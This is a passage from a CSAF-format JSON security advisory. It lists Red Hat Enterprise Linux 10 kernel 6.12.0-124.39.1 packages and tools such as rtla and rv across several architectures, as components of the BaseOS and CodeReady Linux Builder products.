"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.src",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
